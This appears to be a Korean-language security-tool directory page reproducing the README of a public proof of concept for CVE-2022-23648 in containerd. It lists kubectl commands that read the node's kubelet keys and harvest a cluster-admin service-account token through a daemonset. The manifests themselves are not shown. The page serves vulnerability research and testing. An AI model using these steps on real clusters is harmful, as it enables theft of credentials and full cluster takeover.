Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2022-23648-POC — POC for CVE-2022-23648 | Kitploit
도구/GitHubGitHub/raesene/cve-2022-23648-poc
Privilege EscalationContainer SecurityVulnerability AnalysisExploitationPenetration TestingCloud Security
GitHubraesene/cve-2022-23648-poc

CVE-2022-23648-POC

POC for CVE-2022-23648

저장소 보기
36104년 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2022-23648을 위한 PoC

이것은 @_fel1x의 CVE-2022-23648에 대한 개념 증명(Proof of Concept)입니다. 공개 정보는 여기, CVE 정보는 여기, 그리고 추가 정보와 완화 아이디어가 담긴 블로그는 여기에서 확인할 수 있습니다. Containerfile에 필요한 정보가 있으며, VOLUME의 대상을 변경하여 다양한 경로를 시험해 볼 수 있습니다.

작동하는 것을 보여주는 가장 쉬운 방법은 KinD를 사용하는 것입니다. KinD는 취약한 이미지를 가지고 있습니다.

기본 테스트 절차

노드에 /var/lib/kubelet/pki에 데이터가 많은 경우가 아니라면, 이 테스트는 안전합니다.

  • kind create cluster --image=kindest/node:v1.21.1
  • kubectl create -f pod-manifest.yaml
  • kubectl exec poctest -- ls /var/lib/kubelet/pki/

그리고 kubelet.key를 포함한 파일들이 반환되면 작동한 것입니다 :)

Cluster-admin으로 권한 상승 시도

참고: 프로덕션 클러스터에서 시도하지 마십시오. 취약한 Containerd는 공격 파드에 많은 데이터를 복제하여 디스크 공간을 소진시킬 수 있습니다. 또한, 이 작업은 cluster-admin 서비스 계정 토큰을 파드 로그에 출력하며, 이는 일반 텍스트로 로깅 대상에 전송될 가능성이 높습니다.

이것은 노드의 모든 Kubernetes 서비스 계정 토큰을 열거하고, cluster-admin 토큰으로 확인되면 파드 로그에 출력하는 데몬셋을 실행합니다.

  • kubectl apply -f ds.yaml
  • kubectl --token="$(kubectl logs -l app=poctest | head -1)" auth can-i '*' '*' -A

yes가 출력되면 축하합니다. 단기 cluster-admin 서비스 계정 토큰을 획득한 것입니다. 다음을 실행하십시오:

  • kubectl logs -l app=poctest | head -1 | awk -F\. '{print $2}' | base64 -d 어떤 SA인지 확인하려면
  • kubectl --token="$(kubectl logs -l app=poctest | head -1)" get pods -A
  • kubectl --token="$(kubectl logs -l app=poctest | head -1)" auth can-i --list

작성자

  • Rory McCune @raesene

기여자

  • @BradGeesaman - 권한 상승 데몬셋
도구 다운로드